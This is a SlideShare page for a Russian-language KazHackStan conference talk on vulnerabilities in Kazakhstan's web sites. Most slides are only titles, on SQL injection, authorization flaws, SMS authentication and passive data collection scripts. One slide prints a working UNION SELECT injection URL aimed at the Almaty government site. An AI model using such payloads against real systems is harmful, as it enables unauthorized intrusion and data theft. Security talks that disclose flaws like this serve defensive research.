SlideShare a Scribd company logo

Батыржан Тютеев (Казахстан), ЦАРКА. Уязвимости Казнета

K
KazHackStan

Документ обсуждает уязвимость веб-сайта алматинского правительства к SQL-инъекциям. В нем также упоминаются механизмы авторизации и возможность использования SMS-аутентификации. Дополнительно представлены файлы для пассивного сбора данных и призыв к вопросам.

Technology
1 of 22
Downloaded 10 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
b4tr “Уязвимый kaznet”
SQL-injection
SQL-injection http://almaty.gov.kz/page.php/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(database()),NULL,NULL-- -
Батыржан Тютеев (Казахстан), ЦАРКА. Уязвимости Казнета
’ 15 символов
Батыржан Тютеев (Казахстан), ЦАРКА. Уязвимости Казнета
Проблемы механизма авторизации
Батыржан Тютеев (Казахстан), ЦАРКА. Уязвимости Казнета
Батыржан Тютеев (Казахстан), ЦАРКА. Уязвимости Казнета
Батыржан Тютеев (Казахстан), ЦАРКА. Уязвимости Казнета
тут ты должен включить видосик
Батыржан Тютеев (Казахстан), ЦАРКА. Уязвимости Казнета
SMS - аутентификация или что-то типо того
Батыржан Тютеев (Казахстан), ЦАРКА. Уязвимости Казнета
Батыржан Тютеев (Казахстан), ЦАРКА. Уязвимости Казнета
Батыржан Тютеев (Казахстан), ЦАРКА. Уязвимости Казнета
Батыржан Тютеев (Казахстан), ЦАРКА. Уязвимости Казнета
Пассивный сбор данных citizen_1.py citizen_2.py
Батыржан Тютеев (Казахстан), ЦАРКА. Уязвимости Казнета
Батыржан Тютеев (Казахстан), ЦАРКА. Уязвимости Казнета
Вопросы?
СПАСИБО ЗА ВНИМАНИЕ!

More Related Content

PPTX
Андрей Масалович (Россия). Корпоративная защита в РК глазами хакера
KazHackStan
 
PDF
Евгений Гончаров (Россия, Казахстан). Автоматизация рутины AD
KazHackStan
 
PPTX
Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...
KazHackStan
 
PPTX
Тимур Юнусов (Россия), Positive Technologies. Уязвимости банкоматов
KazHackStan
 
PPTX
Антон Bo0oM Лопаницын (Россия), OnSec. Трекинг. Как узнать посетителя, если о...
KazHackStan
 
PDF
Омар Ганиев (Россия). Обзор атак на модели машинного обучения
KazHackStan
 
PPTX
Валерий Блонский (Казахстан), PACIFICA. Как угнать Ботнет
KazHackStan
 
PPTX
Татьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotem
KazHackStan
 
Андрей Масалович (Россия). Корпоративная защита в РК глазами хакера
KazHackStan
 
Евгений Гончаров (Россия, Казахстан). Автоматизация рутины AD
KazHackStan
 
Иван Чалыкин (Россия), Digital Security. Легальный SOP Bypass. Проблемы внедр...
KazHackStan
 
Тимур Юнусов (Россия), Positive Technologies. Уязвимости банкоматов
KazHackStan
 
Антон Bo0oM Лопаницын (Россия), OnSec. Трекинг. Как узнать посетителя, если о...
KazHackStan
 
Омар Ганиев (Россия). Обзор атак на модели машинного обучения
KazHackStan
 
Валерий Блонский (Казахстан), PACIFICA. Как угнать Ботнет
KazHackStan
 
Татьяна Новикова (Казахстан), ЦАРКА. Как мы мониторим Казнет с помощью WebTotem
KazHackStan
 

More from KazHackStan (14)

PPTX
Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...
KazHackStan
 
PPTX
Ярослав Бабин (Россия), Positive Technologies. Основные аспекты при проведени...
KazHackStan
 
PPTX
Виталий Трахтенберг (Израиль), MER Group. Кейс по кибер-расследованию для одн...
KazHackStan
 
PDF
Валерий Боронин (Россия), Positive Technologies. SSDL для руководителей: как ...
KazHackStan
 
PDF
Сергей Белов (Россия), Mail.ru. Temple of Bug Bounty: Leveling & Farming
KazHackStan
 
PDF
Максим Ефименко (Казахстан), ЦАРКА. Двойное проникновение
KazHackStan
 
PDF
Сергей Харюк (Украина). Проверка безопасности приложений на платформе iOS
KazHackStan
 
PDF
Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...
KazHackStan
 
PDF
Ярослав Бабин (Россия), Positive Technologies. Основные аспекты при проведени...
KazHackStan
 
PDF
Ильяс Аринов (Казахстан), ЦАРКА. Linux for newbie hackers
KazHackStan
 
PPTX
Презентация НИТ
KazHackStan
 
PPTX
Дмитрий Кузнецов. Опыт РФ в обеспечении национальной кибербезопасности
KazHackStan
 
PPTX
Алексей Морозов (Россия), Rambler.ru. ASP.NET в помощь хакеру и не только....
KazHackStan
 
PDF
Артём Синицын, Microsoft. Падение Олимпа: как защитить ваш домен Active Direc...
KazHackStan
 
Шамбулов У. К. (Казахстан), ГТС. Анализ и исследование инцидентов информацион...
KazHackStan
 
Ярослав Бабин (Россия), Positive Technologies. Основные аспекты при проведени...
KazHackStan
 
Виталий Трахтенберг (Израиль), MER Group. Кейс по кибер-расследованию для одн...
KazHackStan
 
Валерий Боронин (Россия), Positive Technologies. SSDL для руководителей: как ...
KazHackStan
 
Сергей Белов (Россия), Mail.ru. Temple of Bug Bounty: Leveling & Farming
KazHackStan
 
Максим Ефименко (Казахстан), ЦАРКА. Двойное проникновение
KazHackStan
 
Сергей Харюк (Украина). Проверка безопасности приложений на платформе iOS
KazHackStan
 
Андрей Абакумов (Россия). Yandex.ru. Соавтор: Эльдар Заитов. Автоматизация ск...
KazHackStan
 
Ярослав Бабин (Россия), Positive Technologies. Основные аспекты при проведени...
KazHackStan
 
Ильяс Аринов (Казахстан), ЦАРКА. Linux for newbie hackers
KazHackStan
 
Презентация НИТ
KazHackStan
 
Дмитрий Кузнецов. Опыт РФ в обеспечении национальной кибербезопасности
KazHackStan
 
Алексей Морозов (Россия), Rambler.ru. ASP.NET в помощь хакеру и не только....
KazHackStan
 
Артём Синицын, Microsoft. Падение Олимпа: как защитить ваш домен Active Direc...
KazHackStan
 
Ad

Батыржан Тютеев (Казахстан), ЦАРКА. Уязвимости Казнета